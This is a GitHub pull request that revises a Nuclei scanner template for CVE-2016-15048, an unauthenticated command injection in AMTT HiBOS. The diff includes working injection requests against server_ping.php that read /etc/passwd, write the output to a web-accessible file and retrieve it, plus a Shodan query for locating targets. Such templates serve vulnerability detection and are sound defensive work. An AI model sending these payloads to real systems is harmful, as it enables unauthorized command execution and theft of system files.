### PR TITLE
Added CVE-2016-15048 template

### DIFF
--- a/http/cves/2016/CVE-2016-15048.yaml
+++ b/http/cves/2016/CVE-2016-15048.yaml
@@ -2,7 +2,7 @@ id: CVE-2016-15048
 
 info:
   name: AMTT HiBOS - Unauthenticated Command Injection
-  author: D3nverNg, thewindghost
+  author: D3nverNg,thewindghost
   severity: critical
   description: |
     AMTT Hotel Broadband Operation System (HiBOS) contains an unauthenticated command injection vulnerability in /manager/radius/server_ping.php. 
@@ -10,7 +10,7 @@ info:
     as the web server user without authentication.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2016-15048
-    - https://www.exploit-db.com/exploits/
+    - https://github.com/adysec/nuclei_poc/blob/49c283b2bbb244c071786a2b768fbdde1b91f38e/poc/remote_code_execution/hiboss-rce_2.yaml
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -20,43 +20,52 @@ info:
     epss-percentile: 0.99442
   metadata:
     verified: true
-    max-request: 2
+    max-request: 3
     vendor: amtt
     product: hibos
     shodan-query: "HiBOS"
   tags: cve,cve2016,amtt,hibos,rce,injection,unauth,kev
 
+variables:
+  rand_file: "{{rand_text_alpha(8)}}"
+
 http:
   - raw:
       - |
-        GET /manager/radius/server_ping.php?ip=127.0.0.1|cat/etc/passwd HTTP/1.1
+        GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd HTTP/1.1
         Host: {{Hostname}}
         User-Agent: Mozilla/5.0
-        Accept: */*
         Connection: close
-    
+        
+      - |
+        GET /manager/radius/server_ping.php?ip=127.0.0.1|cat%20/etc/passwd>../../{{rand_file}}.txt&id=1 HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+        Connection: close
+        
+      - |
+        GET /{{rand_file}}.txt HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+        Connection: close
+        
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: regex
         part: body
         regex:
-          - "root:.*:0:0:"
-
-      - type: status
-        status:
-          - 200
-
+          - "root:[^:]*:[0-9]+:0:"
+      
+      - type: word
+        part: body
+        words:
+          - ":/root:"
+          - ":/bin/"
+        condition: or
+    
     extractors:
       - type: regex
-        name: command_output
         part: body
         regex:
-          - "([a-zA-Z0-9_-]+):([^:]*):([0-9]+):([0-9]+):([^:]*):([^:]*):([^\n]*)"
-        group: 0
-
-      - type: dsl
-        dsl:
-          - '"CVE-2016-15048: AMTT HiBoss RCE vulnerability confirmed"'
-          - '"Vulnerable endpoint: /manager/radius/server_ping.php"'
-          - '"Command executed successfully without authentication"'
-
+          - "root:.*:0:0:.*"


### PR DESCRIPTION
/claim #14655
### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Added CVE-2016-15048 template
- References:
    - https://nvd.nist.gov/vuln/detail/CVE-2016-15048
    - https://github.com/adysec/nuclei_poc/blob/49c283b2bbb244c071786a2b768fbdde1b91f38e/poc/remote_code_execution/hiboss-rce_2.yaml
### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

### Additional References:
**Old Version:**

![CVE-2016-15048-1](https://github.com/user-attachments/assets/ed858eeb-9bdb-4e00-a2c7-3f1ab2798cb3)

- With `-debug`:

![CVE-2016-15048-2](https://github.com/user-attachments/assets/7b33eb19-6374-405a-88f9-5f7424684304)

**New Version:**

Target uses an updated AMTT HiBOS version. The exploit no longer works, and the request now returns the login page.

![CVE-2016-15048-3](https://github.com/user-attachments/assets/342ddb48-86b6-4575-b6c2-52a2f2883600)

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
